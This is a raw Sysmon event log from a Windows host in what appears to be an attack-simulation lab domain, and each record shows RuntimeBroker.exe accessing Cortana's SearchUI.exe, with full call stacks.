12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246072C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.onecore.dll+1602f|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000007356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246072C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15fb7|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x80000000000000007354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
